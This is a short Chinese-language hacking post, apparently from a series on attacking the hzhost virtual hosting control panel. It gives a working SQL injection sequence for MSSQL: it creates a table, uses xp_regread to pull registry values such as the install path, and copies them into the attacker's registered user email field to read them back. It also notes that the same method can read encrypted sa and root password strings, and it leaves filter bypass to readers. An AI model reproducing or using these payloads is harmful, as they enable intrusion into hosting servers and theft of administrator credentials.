有一些朋友在看了我的hzhost入侵系列文章后,也遇到过目录不在D盘的困难.
我在<再爆hzhost虚拟主机sql注射漏洞>中提到过,可以把注册表中的存放绝对路径值更新到用户某个字段中,再去读.当然只是个人思路.没有给出具体的操作方法.
我经过一些测试.在本地模拟测试中,终于弄好了.现在放出来.
以下是引用片段:
DROP TABLE [xxbing] //如果存在这个表,先把他删掉.
create table [dbo].[xxbing] ([xxni][varchar](4000)) //新建xxbing表,插如xxni字段
DECLARE @result varchar(4000) exec master..xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE\hzhost\config\settings’,’agentroot’,@result output insert into xxbing (xxni) values(@result);-- //把从注册表中读的值得放到xxni中.
update memlst set u_eml=(select xxni from xxbing) where u_nme='用户名'//更新你注册的用户的e-mail为hzhost的安装绝对路径.
这几条语句怎么饶过检测函数,大家自己去替换.这不仅可以读hzhost的设置信息,还可以读hzhost的sa,root加密字符串.
还可以读3389端口.==,只要注册表中存在的值.
不过也会有失败的时候,比如数据库连接用户权限太小,xp_regread被删了,或者读的字符串太长.
(u_eml只有50,读太长的数据会失败)
注明:我只在本机mssql2000,查询分析器中测试了一遍,并没有实际去在网站上操作.我测试时使用的权限是DBO.